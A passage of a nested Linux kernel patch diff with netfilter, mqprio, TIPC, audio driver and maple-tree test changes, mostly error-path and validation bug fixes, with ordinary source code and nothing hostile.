+ 			NL_SET_BAD_ATTR(extack, nla[NFTA_RULE_CHAIN]);
+ 			return PTR_ERR(chain);
+ 		}
+-		if (nft_chain_is_bound(chain))
+-			return -EOPNOTSUPP;
+ 
+ 	} else if (nla[NFTA_RULE_CHAIN_ID]) {
+ 		chain = nft_chain_lookup_byid(net, table, nla[NFTA_RULE_CHAIN_ID],
+@@ -3640,6 +3638,9 @@ static int nf_tables_newrule(struct sk_buff *skb, const struct nfnl_info *info,
+ 		return -EINVAL;
+ 	}
+ 
++	if (nft_chain_is_bound(chain))
++		return -EOPNOTSUPP;
++
+ 	if (nla[NFTA_RULE_HANDLE]) {
+ 		handle = be64_to_cpu(nla_get_be64(nla[NFTA_RULE_HANDLE]));
+ 		rule = __nft_rule_lookup(chain, handle);
+@@ -6504,19 +6505,19 @@ static int nft_add_set_elem(struct nft_ctx *ctx, struct nft_set *set,
+ 	if (flags)
+ 		*nft_set_ext_flags(ext) = flags;
+ 
++	if (obj) {
++		*nft_set_ext_obj(ext) = obj;
++		obj->use++;
++	}
+ 	if (ulen > 0) {
+ 		if (nft_set_ext_check(&tmpl, NFT_SET_EXT_USERDATA, ulen) < 0) {
+ 			err = -EINVAL;
+-			goto err_elem_userdata;
++			goto err_elem_free;
+ 		}
+ 		udata = nft_set_ext_userdata(ext);
+ 		udata->len = ulen - 1;
+ 		nla_memcpy(&udata->data, nla[NFTA_SET_ELEM_USERDATA], ulen);
+ 	}
+-	if (obj) {
+-		*nft_set_ext_obj(ext) = obj;
+-		obj->use++;
+-	}
+ 	err = nft_set_elem_expr_setup(ctx, &tmpl, ext, expr_array, num_exprs);
+ 	if (err < 0)
+ 		goto err_elem_free;
+@@ -6571,10 +6572,9 @@ err_set_full:
+ err_element_clash:
+ 	kfree(trans);
+ err_elem_free:
++	nf_tables_set_elem_destroy(ctx, set, elem.priv);
+ 	if (obj)
+ 		obj->use--;
+-err_elem_userdata:
+-	nft_set_elem_destroy(set, elem.priv, true);
+ err_parse_data:
+ 	if (nla[NFTA_SET_ELEM_DATA] != NULL)
+ 		nft_data_release(&elem.data.val, desc.type);
+diff --git a/net/netfilter/nft_immediate.c b/net/netfilter/nft_immediate.c
+index 900e75e8c3465..391c18e4b3ebd 100644
+--- a/net/netfilter/nft_immediate.c
++++ b/net/netfilter/nft_immediate.c
+@@ -125,15 +125,27 @@ static void nft_immediate_activate(const struct nft_ctx *ctx,
+ 	return nft_data_hold(&priv->data, nft_dreg_to_type(priv->dreg));
+ }
+ 
++static void nft_immediate_chain_deactivate(const struct nft_ctx *ctx,
++					   struct nft_chain *chain,
++					   enum nft_trans_phase phase)
++{
++	struct nft_ctx chain_ctx;
++	struct nft_rule *rule;
++
++	chain_ctx = *ctx;
++	chain_ctx.chain = chain;
++
++	list_for_each_entry(rule, &chain->rules, list)
++		nft_rule_expr_deactivate(&chain_ctx, rule, phase);
++}
++
+ static void nft_immediate_deactivate(const struct nft_ctx *ctx,
+ 				     const struct nft_expr *expr,
+ 				     enum nft_trans_phase phase)
+ {
+ 	const struct nft_immediate_expr *priv = nft_expr_priv(expr);
+ 	const struct nft_data *data = &priv->data;
+-	struct nft_ctx chain_ctx;
+ 	struct nft_chain *chain;
+-	struct nft_rule *rule;
+ 
+ 	if (priv->dreg == NFT_REG_VERDICT) {
+ 		switch (data->verdict.code) {
+@@ -143,20 +155,17 @@ static void nft_immediate_deactivate(const struct nft_ctx *ctx,
+ 			if (!nft_chain_binding(chain))
+ 				break;
+ 
+-			chain_ctx = *ctx;
+-			chain_ctx.chain = chain;
+-
+-			list_for_each_entry(rule, &chain->rules, list)
+-				nft_rule_expr_deactivate(&chain_ctx, rule, phase);
+-
+ 			switch (phase) {
+ 			case NFT_TRANS_PREPARE_ERROR:
+ 				nf_tables_unbind_chain(ctx, chain);
+-				fallthrough;
++				nft_deactivate_next(ctx->net, chain);
++				break;
+ 			case NFT_TRANS_PREPARE:
++				nft_immediate_chain_deactivate(ctx, chain, phase);
+ 				nft_deactivate_next(ctx->net, chain);
+ 				break;
+ 			default:
++				nft_immediate_chain_deactivate(ctx, chain, phase);
+ 				nft_chain_del(chain);
+ 				chain->bound = false;
+ 				chain->table->use--;
+diff --git a/net/netfilter/nft_set_rbtree.c b/net/netfilter/nft_set_rbtree.c
+index 5c05c9b990fba..8d73fffd2d09d 100644
+--- a/net/netfilter/nft_set_rbtree.c
++++ b/net/netfilter/nft_set_rbtree.c
+@@ -217,29 +217,37 @@ static void *nft_rbtree_get(const struct net *net, const struct nft_set *set,
+ 
+ static int nft_rbtree_gc_elem(const struct nft_set *__set,
+ 			      struct nft_rbtree *priv,
+-			      struct nft_rbtree_elem *rbe)
++			      struct nft_rbtree_elem *rbe,
++			      u8 genmask)
+ {
+ 	struct nft_set *set = (struct nft_set *)__set;
+ 	struct rb_node *prev = rb_prev(&rbe->node);
+-	struct nft_rbtree_elem *rbe_prev = NULL;
++	struct nft_rbtree_elem *rbe_prev;
+ 	struct nft_set_gc_batch *gcb;
+ 
+ 	gcb = nft_set_gc_batch_check(set, NULL, GFP_ATOMIC);
+ 	if (!gcb)
+ 		return -ENOMEM;
+ 
+-	/* search for expired end interval coming before this element. */
++	/* search for end interval coming before this element.
++	 * end intervals don't carry a timeout extension, they
++	 * are coupled with the interval start element.
++	 */
+ 	while (prev) {
+ 		rbe_prev = rb_entry(prev, struct nft_rbtree_elem, node);
+-		if (nft_rbtree_interval_end(rbe_prev))
++		if (nft_rbtree_interval_end(rbe_prev) &&
++		    nft_set_elem_active(&rbe_prev->ext, genmask))
+ 			break;
+ 
+ 		prev = rb_prev(prev);
+ 	}
+ 
+-	if (rbe_prev) {
++	if (prev) {
++		rbe_prev = rb_entry(prev, struct nft_rbtree_elem, node);
++
+ 		rb_erase(&rbe_prev->node, &priv->root);
+ 		atomic_dec(&set->nelems);
++		nft_set_gc_batch_add(gcb, rbe_prev);
+ 	}
+ 
+ 	rb_erase(&rbe->node, &priv->root);
+@@ -321,7 +329,7 @@ static int __nft_rbtree_insert(const struct net *net, const struct nft_set *set,
+ 
+ 		/* perform garbage collection to avoid bogus overlap reports. */
+ 		if (nft_set_elem_expired(&rbe->ext)) {
+-			err = nft_rbtree_gc_elem(set, priv, rbe);
++			err = nft_rbtree_gc_elem(set, priv, rbe, genmask);
+ 			if (err < 0)
+ 				return err;
+ 
+diff --git a/net/sched/sch_mqprio.c b/net/sched/sch_mqprio.c
+index 9f26fb7d5823c..b99e0fe0229cf 100644
+--- a/net/sched/sch_mqprio.c
++++ b/net/sched/sch_mqprio.c
+@@ -130,6 +130,97 @@ static int parse_attr(struct nlattr *tb[], int maxtype, struct nlattr *nla,
+ 	return 0;
+ }
+ 
++static int mqprio_parse_nlattr(struct Qdisc *sch, struct tc_mqprio_qopt *qopt,
++			       struct nlattr *opt,
++			       struct netlink_ext_ack *extack)
++{
++	struct mqprio_sched *priv = qdisc_priv(sch);
++	struct nlattr *tb[TCA_MQPRIO_MAX + 1];
++	struct nlattr *attr;
++	int i, rem, err;
++
++	err = parse_attr(tb, TCA_MQPRIO_MAX, opt, mqprio_policy,
++			 sizeof(*qopt));
++	if (err < 0)
++		return err;
++
++	if (!qopt->hw) {
++		NL_SET_ERR_MSG(extack,
++			       "mqprio TCA_OPTIONS can only contain netlink attributes in hardware mode");
++		return -EINVAL;
++	}
++
++	if (tb[TCA_MQPRIO_MODE]) {
++		priv->flags |= TC_MQPRIO_F_MODE;
++		priv->mode = *(u16 *)nla_data(tb[TCA_MQPRIO_MODE]);
++	}
++
++	if (tb[TCA_MQPRIO_SHAPER]) {
++		priv->flags |= TC_MQPRIO_F_SHAPER;
++		priv->shaper = *(u16 *)nla_data(tb[TCA_MQPRIO_SHAPER]);
++	}
++
++	if (tb[TCA_MQPRIO_MIN_RATE64]) {
++		if (priv->shaper != TC_MQPRIO_SHAPER_BW_RATE) {
++			NL_SET_ERR_MSG_ATTR(extack, tb[TCA_MQPRIO_MIN_RATE64],
++					    "min_rate accepted only when shaper is in bw_rlimit mode");
++			return -EINVAL;
++		}
++		i = 0;
++		nla_for_each_nested(attr, tb[TCA_MQPRIO_MIN_RATE64],
++				    rem) {
++			if (nla_type(attr) != TCA_MQPRIO_MIN_RATE64) {
++				NL_SET_ERR_MSG_ATTR(extack, attr,
++						    "Attribute type expected to be TCA_MQPRIO_MIN_RATE64");
++				return -EINVAL;
++			}
++
++			if (nla_len(attr) != sizeof(u64)) {
++				NL_SET_ERR_MSG_ATTR(extack, attr,
++						    "Attribute TCA_MQPRIO_MIN_RATE64 expected to have 8 bytes length");
++				return -EINVAL;
++			}
++
++			if (i >= qopt->num_tc)
++				break;
++			priv->min_rate[i] = *(u64 *)nla_data(attr);
++			i++;
++		}
++		priv->flags |= TC_MQPRIO_F_MIN_RATE;
++	}
++
++	if (tb[TCA_MQPRIO_MAX_RATE64]) {
++		if (priv->shaper != TC_MQPRIO_SHAPER_BW_RATE) {
++			NL_SET_ERR_MSG_ATTR(extack, tb[TCA_MQPRIO_MAX_RATE64],
++					    "max_rate accepted only when shaper is in bw_rlimit mode");
++			return -EINVAL;
++		}
++		i = 0;
++		nla_for_each_nested(attr, tb[TCA_MQPRIO_MAX_RATE64],
++				    rem) {
++			if (nla_type(attr) != TCA_MQPRIO_MAX_RATE64) {
++				NL_SET_ERR_MSG_ATTR(extack, attr,
++						    "Attribute type expected to be TCA_MQPRIO_MAX_RATE64");
++				return -EINVAL;
++			}
++
++			if (nla_len(attr) != sizeof(u64)) {
++				NL_SET_ERR_MSG_ATTR(extack, attr,
++						    "Attribute TCA_MQPRIO_MAX_RATE64 expected to have 8 bytes length");
++				return -EINVAL;
++			}
++
++			if (i >= qopt->num_tc)
++				break;
++			priv->max_rate[i] = *(u64 *)nla_data(attr);
++			i++;
++		}
++		priv->flags |= TC_MQPRIO_F_MAX_RATE;
++	}
++
++	return 0;
++}
++
+ static int mqprio_init(struct Qdisc *sch, struct nlattr *opt,
+ 		       struct netlink_ext_ack *extack)
+ {
+@@ -139,9 +230,6 @@ static int mqprio_init(struct Qdisc *sch, struct nlattr *opt,
+ 	struct Qdisc *qdisc;
+ 	int i, err = -EOPNOTSUPP;
+ 	struct tc_mqprio_qopt *qopt = NULL;
+-	struct nlattr *tb[TCA_MQPRIO_MAX + 1];
+-	struct nlattr *attr;
+-	int rem;
+ 	int len;
+ 
+ 	BUILD_BUG_ON(TC_MAX_QUEUE != TC_QOPT_MAX_QUEUE);
+@@ -166,55 +254,9 @@ static int mqprio_init(struct Qdisc *sch, struct nlattr *opt,
+ 
+ 	len = nla_len(opt) - NLA_ALIGN(sizeof(*qopt));
+ 	if (len > 0) {
+-		err = parse_attr(tb, TCA_MQPRIO_MAX, opt, mqprio_policy,
+-				 sizeof(*qopt));
+-		if (err < 0)
++		err = mqprio_parse_nlattr(sch, qopt, opt, extack);
++		if (err)
+ 			return err;
+-
+-		if (!qopt->hw)
+-			return -EINVAL;
+-
+-		if (tb[TCA_MQPRIO_MODE]) {
+-			priv->flags |= TC_MQPRIO_F_MODE;
+-			priv->mode = *(u16 *)nla_data(tb[TCA_MQPRIO_MODE]);
+-		}
+-
+-		if (tb[TCA_MQPRIO_SHAPER]) {
+-			priv->flags |= TC_MQPRIO_F_SHAPER;
+-			priv->shaper = *(u16 *)nla_data(tb[TCA_MQPRIO_SHAPER]);
+-		}
+-
+-		if (tb[TCA_MQPRIO_MIN_RATE64]) {
+-			if (priv->shaper != TC_MQPRIO_SHAPER_BW_RATE)
+-				return -EINVAL;
+-			i = 0;
+-			nla_for_each_nested(attr, tb[TCA_MQPRIO_MIN_RATE64],
+-					    rem) {
+-				if (nla_type(attr) != TCA_MQPRIO_MIN_RATE64)
+-					return -EINVAL;
+-				if (i >= qopt->num_tc)
+-					break;
+-				priv->min_rate[i] = *(u64 *)nla_data(attr);
+-				i++;
+-			}
+-			priv->flags |= TC_MQPRIO_F_MIN_RATE;
+-		}
+-
+-		if (tb[TCA_MQPRIO_MAX_RATE64]) {
+-			if (priv->shaper != TC_MQPRIO_SHAPER_BW_RATE)
+-				return -EINVAL;
+-			i = 0;
+-			nla_for_each_nested(attr, tb[TCA_MQPRIO_MAX_RATE64],
+-					    rem) {
+-				if (nla_type(attr) != TCA_MQPRIO_MAX_RATE64)
+-					return -EINVAL;
+-				if (i >= qopt->num_tc)
+-					break;
+-				priv->max_rate[i] = *(u64 *)nla_data(attr);
+-				i++;
+-			}
+-			priv->flags |= TC_MQPRIO_F_MAX_RATE;
+-		}
+ 	}
+ 
+ 	/* pre-allocate qdisc, attachment can't fail */
+diff --git a/net/tipc/crypto.c b/net/tipc/crypto.c
+index d67440de011e7..2b236d95a6469 100644
+--- a/net/tipc/crypto.c
++++ b/net/tipc/crypto.c
+@@ -1960,7 +1960,8 @@ rcv:
+ 
+ 	skb_reset_network_header(*skb);
+ 	skb_pull(*skb, tipc_ehdr_size(ehdr));
+-	pskb_trim(*skb, (*skb)->len - aead->authsize);
++	if (pskb_trim(*skb, (*skb)->len - aead->authsize))
++		goto free_skb;
+ 
+ 	/* Validate TIPCv2 message */
+ 	if (unlikely(!tipc_msg_validate(skb))) {
+diff --git a/net/tipc/node.c b/net/tipc/node.c
+index 5e000fde80676..a9c5b6594889b 100644
+--- a/net/tipc/node.c
++++ b/net/tipc/node.c
+@@ -583,7 +583,7 @@ update:
+ 				 n->capabilities, &n->bc_entry.inputq1,
+ 				 &n->bc_entry.namedq, snd_l, &n->bc_entry.link)) {
+ 		pr_warn("Broadcast rcv link creation failed, no memory\n");
+-		kfree(n);
++		tipc_node_put(n);
+ 		n = NULL;
+ 		goto exit;
+ 	}
+diff --git a/sound/pci/hda/patch_realtek.c b/sound/pci/hda/patch_realtek.c
+index cb34a62075b13..f93b68a2a8393 100644
+--- a/sound/pci/hda/patch_realtek.c
++++ b/sound/pci/hda/patch_realtek.c
+@@ -9457,6 +9457,7 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x103c, 0x880d, "HP EliteBook 830 G8 Notebook PC", ALC285_FIXUP_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8811, "HP Spectre x360 15-eb1xxx", ALC285_FIXUP_HP_SPECTRE_X360_EB1),
+ 	SND_PCI_QUIRK(0x103c, 0x8812, "HP Spectre x360 15-eb1xxx", ALC285_FIXUP_HP_SPECTRE_X360_EB1),
++	SND_PCI_QUIRK(0x103c, 0x881d, "HP 250 G8 Notebook PC", ALC236_FIXUP_HP_MUTE_LED_COEFBIT2),
+ 	SND_PCI_QUIRK(0x103c, 0x8846, "HP EliteBook 850 G8 Notebook PC", ALC285_FIXUP_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8847, "HP EliteBook x360 830 G8 Notebook PC", ALC285_FIXUP_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x884b, "HP EliteBook 840 Aero G8 Notebook PC", ALC285_FIXUP_HP_GPIO_LED),
+@@ -9580,6 +9581,7 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x1043, 0x1c62, "ASUS GU603", ALC289_FIXUP_ASUS_GA401),
+ 	SND_PCI_QUIRK(0x1043, 0x1c92, "ASUS ROG Strix G15", ALC285_FIXUP_ASUS_G533Z_PINS),
+ 	SND_PCI_QUIRK(0x1043, 0x1ccd, "ASUS X555UB", ALC256_FIXUP_ASUS_MIC),
++	SND_PCI_QUIRK(0x1043, 0x1d1f, "ASUS ROG Strix G17 2023 (G713PV)", ALC287_FIXUP_CS35L41_I2C_2),
+ 	SND_PCI_QUIRK(0x1043, 0x1d42, "ASUS Zephyrus G14 2022", ALC289_FIXUP_ASUS_GA401),
+ 	SND_PCI_QUIRK(0x1043, 0x1d4e, "ASUS TM420", ALC256_FIXUP_ASUS_HPE),
+ 	SND_PCI_QUIRK(0x1043, 0x1e02, "ASUS UX3402", ALC245_FIXUP_CS35L41_SPI_2),
+diff --git a/sound/soc/codecs/wm8904.c b/sound/soc/codecs/wm8904.c
+index 791d8738d1c0e..a05d4dafd3d77 100644
+--- a/sound/soc/codecs/wm8904.c
++++ b/sound/soc/codecs/wm8904.c
+@@ -2308,6 +2308,9 @@ static int wm8904_i2c_probe(struct i2c_client *i2c)
+ 	regmap_update_bits(wm8904->regmap, WM8904_BIAS_CONTROL_0,
+ 			    WM8904_POBCTRL, 0);
+ 
++	/* Fill the cache for the ADC test register */
++	regmap_read(wm8904->regmap, WM8904_ADC_TEST_0, &val);
++
+ 	/* Can leave the device powered off until we need it */
+ 	regcache_cache_only(wm8904->regmap, true);
+ 	regulator_bulk_disable(ARRAY_SIZE(wm8904->supplies), wm8904->supplies);
+diff --git a/sound/soc/fsl/fsl_spdif.c b/sound/soc/fsl/fsl_spdif.c
+index 275aba8e0c469..fb6806b2db859 100644
+--- a/sound/soc/fsl/fsl_spdif.c
++++ b/sound/soc/fsl/fsl_spdif.c
+@@ -751,6 +751,8 @@ static int fsl_spdif_trigger(struct snd_pcm_substream *substream,
+ 	case SNDRV_PCM_TRIGGER_PAUSE_PUSH:
+ 		regmap_update_bits(regmap, REG_SPDIF_SCR, dmaen, 0);
+ 		regmap_update_bits(regmap, REG_SPDIF_SIE, intr, 0);
++		regmap_write(regmap, REG_SPDIF_STL, 0x0);
++		regmap_write(regmap, REG_SPDIF_STR, 0x0);
+ 		break;
+ 	default:
+ 		return -EINVAL;
+diff --git a/tools/testing/radix-tree/linux/init.h b/tools/testing/radix-tree/linux/init.h
+index 1bb0afc213099..81563c3dfce79 100644
+--- a/tools/testing/radix-tree/linux/init.h
++++ b/tools/testing/radix-tree/linux/init.h
+@@ -1 +1,2 @@
+ #define __init
++#define __exit
+diff --git a/tools/testing/radix-tree/maple.c b/tools/testing/radix-tree/maple.c
+index d1ab5f23f4e4c..cd96a3ee7bb89 100644
+--- a/tools/testing/radix-tree/maple.c
++++ b/tools/testing/radix-tree/maple.c
+@@ -13,6 +13,7 @@
+ #include "test.h"
+ #include <stdlib.h>
+ #include <time.h>
++#include "linux/init.h"
+ 
+ #define module_init(x)
+ #define module_exit(x)
+@@ -58,7 +59,7 @@ struct rcu_reader_struct {
+  * check_new_node() - Check the creation of new nodes and error path
+  * verification.
+  */
+-static noinline void check_new_node(struct maple_tree *mt)
++static noinline void __init check_new_node(struct maple_tree *mt)
+ {
+ 
+ 	struct maple_node *mn, *mn2, *mn3;
+@@ -430,7 +431,7 @@ static noinline void check_new_node(struct maple_tree *mt)
+ /*
+  * Check erasing including RCU.
+  */
+-static noinline void check_erase(struct maple_tree *mt, unsigned long index,
++static noinline void __init check_erase(struct maple_tree *mt, unsigned long index,
+ 		void *ptr)
+ {
+ 	MT_BUG_ON(mt, mtree_test_erase(mt, index) != ptr);
+@@ -440,24 +441,24 @@ static noinline void check_erase(struct maple_tree *mt, unsigned long index,
+ #define erase_check_insert(mt, i) check_insert(mt, set[i], entry[i%2])
+ #define erase_check_erase(mt, i) check_erase(mt, set[i], entry[i%2])
+ 
+-static noinline void check_erase_testset(struct maple_tree *mt)
++static noinline void __init check_erase_testset(struct maple_tree *mt)
+ {
+-	unsigned long set[] = { 5015, 5014, 5017, 25, 1000,
+-				1001, 1002, 1003, 1005, 0,
+-				6003, 6002, 6008, 6012, 6015,
+-				7003, 7002, 7008, 7012, 7015,
+-				8003, 8002, 8008, 8012, 8015,
+-				9003, 9002, 9008, 9012, 9015,
+-				10003, 10002, 10008, 10012, 10015,
+-				11003, 11002, 11008, 11012, 11015,
+-				12003, 12002, 12008, 12012, 12015,
+-				13003, 13002, 13008, 13012, 13015,
+-				14003, 14002, 14008, 14012, 14015,
+-				15003, 15002, 15008, 15012, 15015,
+-			      };
+-
+-
+-	void *ptr = &set;
++	static const unsigned long set[] = { 5015, 5014, 5017, 25, 1000,
++					     1001, 1002, 1003, 1005, 0,
++					     6003, 6002, 6008, 6012, 6015,
++					     7003, 7002, 7008, 7012, 7015,
++					     8003, 8002, 8008, 8012, 8015,
++					     9003, 9002, 9008, 9012, 9015,
++					     10003, 10002, 10008, 10012, 10015,
++					     11003, 11002, 11008, 11012, 11015,
++					     12003, 12002, 12008, 12012, 12015,
++					     13003, 13002, 13008, 13012, 13015,
++					     14003, 14002, 14008, 14012, 14015,
++					     15003, 15002, 15008, 15012, 15015,
++					   };
++
++
++	void *ptr = &check_erase_testset;
+ 	void *entry[2] = { ptr, mt };
+ 	void *root_node;
+ 
+@@ -714,7 +715,7 @@ static noinline void check_erase_testset(struct maple_tree *mt)
+ int mas_ce2_over_count(struct ma_state *mas_start, struct ma_state *mas_end,
+ 		      void *s_entry, unsigned long s_min,
+ 		      void *e_entry, unsigned long e_max,
+-		      unsigned long *set, int i, bool null_entry)
++		      const unsigned long *set, int i, bool null_entry)
+ {
+ 	int count = 0, span = 0;
+ 	unsigned long retry = 0;
+@@ -944,8 +945,8 @@ retry:
+ }
+ 
+ #if defined(CONFIG_64BIT)
+-static noinline void check_erase2_testset(struct maple_tree *mt,
+-		unsigned long *set, unsigned long size)
++static noinline void __init check_erase2_testset(struct maple_tree *mt,
++		const unsigned long *set, unsigned long size)
+ {
+ 	int entry_count = 0;
+ 	int check = 0;
+@@ -1089,11 +1090,11 @@ static noinline void check_erase2_testset(struct maple_tree *mt,
+ 
+ 
+ /* These tests were pulled from KVM tree modifications which failed. */
+-static noinline void check_erase2_sets(struct maple_tree *mt)
++static noinline void __init check_erase2_sets(struct maple_tree *mt)
+ {
+ 	void *entry;
+ 	unsigned long start = 0;
+-	unsigned long set[] = {
++	static const unsigned long set[] = {
+ STORE, 140737488347136, 140737488351231,
+ STORE, 140721266458624, 140737488351231,
+ ERASE, 140721266458624, 140737488351231,
+@@ -1111,7 +1112,7 @@ ERASE, 140253902692352, 140253902864383,
+ STORE, 140253902692352, 140253902696447,
+ STORE, 140253902696448, 140253902864383,
+ 		};
+-	unsigned long set2[] = {
++	static const unsigned long set2[] = {
+ STORE, 140737488347136, 140737488351231,
+ STORE, 140735933583360, 140737488351231,
+ ERASE, 140735933583360, 140737488351231,
+@@ -1135,7 +1136,7 @@ STORE, 140277094813696, 140277094821887,
+ STORE, 140277094821888, 140277094825983,
+ STORE, 140735933906944, 140735933911039,
+ 	};
+-	unsigned long set3[] = {
++	static const unsigned long set3[] = {
+ STORE, 140737488347136, 140737488351231,
+ STORE, 140735790264320, 140737488351231,
+ ERASE, 140735790264320, 140737488351231,
+@@ -1178,7 +1179,7 @@ STORE, 47135835840512, 47135835885567,
+ STORE, 47135835885568, 47135835893759,
+ 	};
+ 
+-	unsigned long set4[] = {
++	static const unsigned long set4[] = {
+ STORE, 140737488347136, 140737488351231,
+ STORE, 140728251703296, 140737488351231,
+ ERASE, 140728251703296, 140737488351231,
+@@ -1199,7 +1200,7 @@ ERASE, 47646523277312, 47646523445247,
+ STORE, 47646523277312, 47646523400191,
+ 	};
+ 
+-	unsigned long set5[] = {
++	static const unsigned long set5[] = {
+ STORE, 140737488347136, 140737488351231,
+ STORE, 140726874062848, 140737488351231,
+ ERASE, 140726874062848, 140737488351231,
+@@ -1332,7 +1333,7 @@ STORE, 47884791619584, 47884791623679,
+ STORE, 47884791623680, 47884791627775,
+ 	};
+ 
+-	unsigned long set6[] = {
++	static const unsigned long set6[] = {
+ STORE, 140737488347136, 140737488351231,
+ STORE, 140722999021568, 140737488351231,
+ ERASE, 140722999021568, 140737488351231,
+@@ -1464,7 +1465,7 @@ ERASE, 47430432014336, 47430432022527,
+ STORE, 47430432014336, 47430432018431,
+ STORE, 47430432018432, 47430432022527,
+ 	};
+-	unsigned long set7[] = {
++	static const unsigned long set7[] = {
+ STORE, 140737488347136, 140737488351231,
+ STORE, 140729808330752, 140737488351231,
+ ERASE, 140729808330752, 140737488351231,
+@@ -1596,7 +1597,7 @@ ERASE, 47439987130368, 47439987138559,
+ STORE, 47439987130368, 47439987134463,
+ STORE, 47439987134464, 47439987138559,
+ 	};
+-	unsigned long set8[] = {
++	static const unsigned long set8[] = {
+ STORE, 140737488347136, 140737488351231,
+ STORE, 140722482974720, 140737488351231,
+ ERASE, 140722482974720, 140737488351231,
+@@ -1729,7 +1730,7 @@ STORE, 47708488638464, 47708488642559,
+ STORE, 47708488642560, 47708488646655,
+ 	};
+ 
+-	unsigned long set9[] = {
++	static const unsigned long set9[] = {
+ STORE, 140737488347136, 140737488351231,
+ STORE, 140736427839488, 140737488351231,
+ ERASE, 140736427839488, 140736427839488,
+@@ -5595,7 +5596,7 @@ ERASE, 47906195480576, 47906195480576,
+ STORE, 94641242615808, 94641242750975,
+ 	};
+ 
+-	unsigned long set10[] = {
++	static const unsigned long set10[] = {
+ STORE, 140737488347136, 140737488351231,
+ STORE, 140736427839488, 140737488351231,
+ ERASE, 140736427839488, 140736427839488,
+@@ -9459,7 +9460,7 @@ STORE, 139726599680000, 139726599684095,
+ ERASE, 47906195480576, 47906195480576,
+ STORE, 94641242615808, 94641242750975,
+ 	};
+-	unsigned long set11[] = {
++	static const unsigned long set11[] = {
+ STORE, 140737488347136, 140737488351231,
+ STORE, 140732658499584, 140737488351231,
+ ERASE, 140732658499584, 140732658499584,
+@@ -9485,7 +9486,7 @@ STORE, 140732658565120, 140732658569215,
+ STORE, 140732658552832, 140732658565119,
+ 	};
+ 
+-	unsigned long set12[] = { /* contains 12 values. */
++	static const unsigned long set12[] = { /* contains 12 values. */
+ STORE, 140737488347136, 140737488351231,
+ STORE, 140732658499584, 140737488351231,
+ ERASE, 140732658499584, 140732658499584,
+@@ -9512,7 +9513,7 @@ STORE, 140732658552832, 140732658565119,
+ STORE, 140014592741375, 140014592741375, /* contrived */
+ STORE, 140014592733184, 140014592741376, /* creates first entry retry. */
+ 	};
+-	unsigned long set13[] = {
++	static const unsigned long set13[] = {
+ STORE, 140373516247040, 140373516251135,/*: ffffa2e7b0e10d80 */
+ STORE, 140373516251136, 140373516255231,/*: ffffa2e7b1195d80 */
+ STORE, 140373516255232, 140373516443647,/*: ffffa2e7b0e109c0 */
+@@ -9525,7 +9526,7 @@ STORE, 140373518684160, 140373518688254,/*: ffffa2e7b05fec00 */
+ STORE, 140373518688256, 140373518692351,/*: ffffa2e7bfbdcd80 */
+ STORE, 140373518692352, 140373518696447,/*: ffffa2e7b0749e40 */
+ 	};
+-	unsigned long set14[] = {
++	static const unsigned long set14[] = {
+ STORE, 140737488347136, 140737488351231,
+ STORE, 140731667996672, 140737488351231,
+ SNULL, 140731668000767, 140737488351231,
+@@ -9809,7 +9810,7 @@ SNULL, 139826136543232, 139826136809471,
+ STORE, 139826136809472, 139826136842239,
+ STORE, 139826136543232, 139826136809471,
+ 	};
+-	unsigned long set15[] = {
++	static const unsigned long set15[] = {
+ STORE, 140737488347136, 140737488351231,
+ STORE, 140722061451264, 140737488351231,
+ SNULL, 140722061455359, 140737488351231,
+@@ -10094,7 +10095,7 @@ STORE, 139906808958976, 139906808991743,
+ STORE, 139906808692736, 139906808958975,
+ 	};
+ 
+-	unsigned long set16[] = {
++	static const unsigned long set16[] = {
+ STORE, 94174808662016, 94174809321471,
+ STORE, 94174811414528, 94174811426815,
+ STORE, 94174811426816, 94174811430911,
+@@ -10305,7 +10306,7 @@ STORE, 139921865613312, 139921865617407,
+ STORE, 139921865547776, 139921865564159,
+ 	};
+ 
+-	unsigned long set17[] = {
++	static const unsigned long set17[] = {
+ STORE, 94397057224704, 94397057646591,
+ STORE, 94397057650688, 94397057691647,
+ STORE, 94397057691648, 94397057695743,
+@@ -10367,7 +10368,7 @@ STORE, 140720477511680, 140720477646847,
+ STORE, 140720478302208, 140720478314495,
+ STORE, 140720478314496, 140720478318591,
+ 	};
+-	unsigned long set18[] = {
++	static const unsigned long set18[] = {
+ STORE, 140737488347136, 140737488351231,
+ STORE, 140724953673728, 140737488351231,
+ SNULL, 140724953677823, 140737488351231,
+@@ -10400,7 +10401,7 @@ STORE, 140222970597376, 140222970605567,
+ ERASE, 140222970597376, 140222970605567,
+ STORE, 140222970597376, 140222970605567,
+ 	};
+-	unsigned long set19[] = {
++	static const unsigned long set19[] = {
+ STORE, 140737488347136, 140737488351231,
+ STORE, 140725182459904, 140737488351231,
+ SNULL, 140725182463999, 140737488351231,
+@@ -10669,7 +10670,7 @@ STORE, 140656836775936, 140656836780031,
+ STORE, 140656787476480, 140656791920639,
+ ERASE, 140656774639616, 140656779083775,
+ 	};
+-	unsigned long set20[] = {
++	static const unsigned long set20[] = {
+ STORE, 140737488347136, 140737488351231,
+ STORE, 140735952392192, 140737488351231,
+ SNULL, 140735952396287, 140737488351231,
+@@ -10825,7 +10826,7 @@ STORE, 140590386819072, 140590386823167,
+ STORE, 140590386823168, 140590386827263,
+ SNULL, 140590376591359, 140590376595455,
+ 	};
+-	unsigned long set21[] = {
++	static const unsigned long set21[] = {
+ STORE, 93874710941696, 93874711363583,
+ STORE, 93874711367680, 93874711408639,
+ STORE, 93874711408640, 93874711412735,
+@@ -10895,7 +10896,7 @@ ERASE, 140708393312256, 140708393316351,
+ ERASE, 140708393308160, 140708393312255,
+ ERASE, 140708393291776, 140708393308159,
+ 	};
+-	unsigned long set22[] = {
++	static const unsigned long set22[] = {
+ STORE, 93951397134336, 93951397183487,
+ STORE, 93951397183488, 93951397728255,
+ STORE, 93951397728256, 93951397826559,
+@@ -11022,7 +11023,7 @@ STORE, 140551361253376, 140551361519615,
+ ERASE, 140551361253376, 140551361519615,
+ 	};
+ 
+-	unsigned long set23[] = {
++	static const unsigned long set23[] = {
+ STORE, 94014447943680, 94014448156671,
+ STORE, 94014450253824, 94014450257919,
+ STORE, 94014450257920, 94014450266111,
+@@ -14346,7 +14347,7 @@ SNULL, 140175956627455, 140175985139711,
+ STORE, 140175927242752, 140175956627455,
